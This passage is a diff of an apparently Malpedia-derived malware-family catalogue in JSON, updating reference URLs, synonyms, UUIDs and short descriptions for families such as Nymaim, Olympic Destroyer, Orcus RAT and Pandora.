"https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/", "https://www.lawfareblog.com/what-point-these-nation-state-indictments", - "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded", + "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0", + "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + "https://blog.talosintelligence.com/goznym/", + "https://bitbucket.org/daniel_plohmann/idapatchwork", "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf", + "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded", + "https://www.virusbulletin.com/conference/vb2017/abstracts/linking-xpaj-and-nymaim", "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled", - "https://bitbucket.org/daniel_plohmann/idapatchwork" + "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/", + "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim", + "https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf", + "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/" ], "synonyms": [ "nymain" @@ -36288,19 +37977,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat", - "https://securelist.com/transparent-tribe-part-2/98233/", "https://www.secrss.com/articles/24995", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf", - "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/", - "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html", - "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", - "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html", - "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html", "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html", + "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html", + "https://securelist.com/transparent-tribe-part-2/98233/", + "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/", + "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", + "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] @@ -36322,6 +38011,19 @@ "uuid": "8f623a37-80a4-4240-9586-6ea7a2a97e30", "value": "Obscene" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.observer_stealer", + "https://medium.com/@cyberhust1er/observerstealer-unmasking-the-new-contender-in-cyber-crime-6e54a40d801d" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9ddbf63f-c9a2-4bd6-8449-189f2d2ce5e4", + "value": "ObserverStealer" + }, { "description": "", "meta": { @@ -36340,10 +38042,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus", - "https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf", + "https://securelist.com/octopus-infested-seas-of-central-asia/88200/", "https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw", - "https://isc.sans.edu/diary/26918", - "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + "https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf", + "https://isc.sans.edu/diary/26918" ], "synonyms": [], "type": [] @@ -36385,8 +38087,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", - "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] @@ -36399,10 +38101,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum", - "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", - "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" + "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/" ], "synonyms": [], "type": [] @@ -36415,9 +38117,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait", - "https://www.secjuice.com/fancy-bear-review/", "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf" + "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.secjuice.com/fancy-bear-review/" ], "synonyms": [ "Sasfis" @@ -36432,30 +38134,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", - "https://www.youtube.com/watch?v=rjA0Vf75cYk", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", - "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", - "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", - "https://www.youtube.com/watch?v=1jgdMY12mI8", - "https://www.youtube.com/watch?v=wCv9SiSA7Sw", - "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/", "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", - "https://securelist.com/the-devils-in-the-rich-header/84348/", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.youtube.com/watch?v=a4BZ3SZN-CI", - "https://attack.mitre.org/groups/G0034", - "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/", - "https://securelist.com/olympic-destroyer-is-still-alive/86169/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.mbsd.jp/blog/20180215.html", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", - "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://www.youtube.com/watch?v=wCv9SiSA7Sw", + "https://www.youtube.com/watch?v=a4BZ3SZN-CI", + "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", + "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.mbsd.jp/blog/20180215.html", + "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/", + "https://attack.mitre.org/groups/G0034", + "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights", - "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too" + "https://www.youtube.com/watch?v=1jgdMY12mI8", + "https://www.youtube.com/watch?v=rjA0Vf75cYk", + "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", + "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" ], "synonyms": [ "SOURGRAPE" @@ -36470,8 +38172,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", - "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators", - "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" + "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] @@ -36497,11 +38199,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock", "https://www.f-secure.com/weblog/archives/00002764.html", - "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", - "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", "https://blog.f-secure.com/podcast-dukes-apt29/", - "https://www.secureworks.com/research/threat-profiles/iron-hemlock" + "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/" ], "synonyms": [], "type": [] @@ -36514,9 +38216,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", - "https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet", - "https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html", "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/", + "https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html", + "https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet", "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" ], "synonyms": [ @@ -36533,10 +38235,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" ], "synonyms": [], @@ -36550,9 +38252,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", - "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", - "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", + "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", + "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", "https://forum.malekal.com/viewtopic.php?t=21806" ], "synonyms": [], @@ -36587,6 +38289,19 @@ "uuid": "03d44ec8-ebb4-4d90-9773-c11f4a7de074", "value": "OpenSUpdater" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.open_carrot", + "https://www.sentinelone.com/labs/comrades-in-arms-north-korea-compromises-sanctioned-russian-missile-engineering-company/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7fb5882e-1682-45d3-9dfb-204e6c1ca4c9", + "value": "OpenCarrot" + }, { "description": "This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.", "meta": { @@ -36631,8 +38346,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", - "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", - "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood" ], "synonyms": [], "type": [] @@ -36641,16 +38356,18 @@ "value": "OrcaRAT" }, { - "description": "A malware generating DGA domains seeded by the Bitcoin Genesis Block.", + "description": "A malware generating DGA domains seeded by the Bitcoin Genesis Block. This family has strong code overlap with win.victorygate.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard", - "https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/", + "https://blog.netlab.360.com/orchard-dga/", "https://malverse.it/stack-string-decryptor-con-ghidra-emulator-orchard", "https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/", - "https://blog.netlab.360.com/orchard-dga/" + "https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/" + ], + "synonyms": [ + "Antavmu" ], - "synonyms": [], "type": [] }, "uuid": "094159e7-cc4f-4c47-b24e-b0a32ba23a58", @@ -36661,19 +38378,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", - "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", - "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", - "https://asec.ahnlab.com/en/45462/", - "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", - "https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/", "https://assets.virustotal.com/reports/2021trends.pdf", - "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/" + "https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/", + "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", + "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", + "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", + "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", + "https://asec.ahnlab.com/en/45462/", + "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", + "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [ "Schnorchel" @@ -36688,12 +38405,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", - "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/", "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html", - "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", - "https://www.gdata.de/blog/2017/11/30151-ordinypt", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat" + "https://www.gdata.de/blog/2017/11/30151-ordinypt", + "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/", + "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" ], "synonyms": [ "GermanWiper", @@ -36722,16 +38439,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski", - "https://cyberint.com/blog/research/mars-stealer/", "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become", + "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", + "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer", "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", - "https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601", + "https://twitter.com/albertzsigovits/status/1160874557454131200", "https://3xp0rt.com/posts/mars-stealer", "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/", - "https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view", - "https://twitter.com/albertzsigovits/status/1160874557454131200", - "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer", - "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468" + "https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601", + "https://cyberint.com/blog/research/mars-stealer/", + "https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view" ], "synonyms": [], "type": [] @@ -36744,8 +38461,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.osno", - "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit", - "https://labs.k7computing.com/?p=21562" + "https://labs.k7computing.com/?p=21562", + "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit" ], "synonyms": [ "Babax" @@ -36760,8 +38477,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ousaban", - "https://www.netskope.com/blog/ousaban-latam-banking-malware-abusing-cloud-services", "https://www.welivesecurity.com/2021/05/05/ousaban-private-photo-collection-hidden-cabinet/", + "https://www.netskope.com/blog/ousaban-latam-banking-malware-abusing-cloud-services", "https://www.atomicmatryoshka.com/post/ousaban-msi-installer-analysis" ], "synonyms": [], @@ -36788,9 +38505,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", + "https://twitter.com/VK_Intel/status/1085820673811992576", "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://twitter.com/VK_Intel/status/1085820673811992576" + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [ "FACADE" @@ -36801,7 +38518,7 @@ "value": "Outlook Backdoor" }, { - "description": "", + "description": "According to MITRE, OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.outsteel", @@ -36818,8 +38535,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", - "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking", - "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/" + "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", + "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" ], "synonyms": [], "type": [] @@ -36845,8 +38562,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", - "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" + "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/", + "https://www.secureworks.com/research/threat-profiles/bronze-union" ], "synonyms": [ "luckyowa" @@ -36862,8 +38579,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy", "https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/", - "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf", "https://securelist.com/the-sessionmanager-iis-backdoor/106868/", + "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf", "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20" ], "synonyms": [], @@ -36958,24 +38675,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", - "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", - "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", - "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/", - "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", - "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", - "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", + "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", + "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", + "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", + "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", + "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", + "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", + "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/", + "https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847", + "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", + "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://www.youtube.com/watch?v=J7VOfAJvxEY", "https://www.spamhaus.org/news/article/771/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", - "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", - "https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", - "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [ "ZeusPanda" @@ -36990,8 +38707,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer", - "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", - "https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html" + "https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html", + "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/" ], "synonyms": [], "type": [] @@ -37004,12 +38721,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora", - "https://www.fortinet.com/blog/threat-research/Using-emulation-against-anti-reverse-engineering-techniques", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", "https://kienmanowar.wordpress.com/2022/03/21/quicknote-analysis-of-pandora-ransomware/", - "https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://www.fortinet.com/blog/threat-research/looking-inside-pandoras-box", + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://www.fortinet.com/blog/threat-research/Using-emulation-against-anti-reverse-engineering-techniques", + "https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/", "https://cloudsek.com/technical-analysis-of-emerging-sophisticated-pandora-ransomware-group/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://dissectingmalwa.re/blog/pandora/" @@ -37026,8 +38743,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora_rat", "https://github.com/AZMagic/Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx", - "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya" + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware" ], "synonyms": [ "Pandora hVNC RAT" @@ -37042,8 +38759,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradies_clipper", - "https://www.youtube.com/watch?v=wjoH9jW2EPQ", - "https://perception-point.io/blog/behind-the-attack-paradies-clipper-malware/" + "https://perception-point.io/blog/behind-the-attack-paradies-clipper-malware/", + "https://www.youtube.com/watch?v=wjoH9jW2EPQ" ], "synonyms": [], "type": [] @@ -37056,14 +38773,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise", - "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/", + "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://asec.ahnlab.com/en/47590/", "https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/", "https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html", - "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/", + "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again", + 